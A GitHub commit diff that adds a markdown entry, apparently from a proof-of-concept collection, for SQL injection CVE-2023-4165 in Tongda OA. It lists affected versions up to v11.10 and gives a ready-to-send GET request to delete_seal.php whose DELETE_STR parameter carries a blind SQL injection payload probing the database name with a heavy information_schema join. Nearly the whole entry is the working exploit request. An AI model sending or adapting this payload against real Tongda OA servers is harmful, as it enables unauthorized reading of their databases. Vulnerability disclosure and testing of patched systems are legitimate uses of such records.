Update 通达OA sql注入漏洞 CVE-2023-4165.md

This commit is contained in:
wy876
2023-11-03 21:12:25 +08:00
committed by GitHub
parent 577b8b1322
commit 6c4cb1e193

View File

@@ -1,4 +1,10 @@
## 通达OA sql注入漏洞 CVE-2023-4165
## 影响版本
```
通达OA ≤ v11.10v2017
```
## poc
```
GET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1.1
Host: 127.0.0.1:8080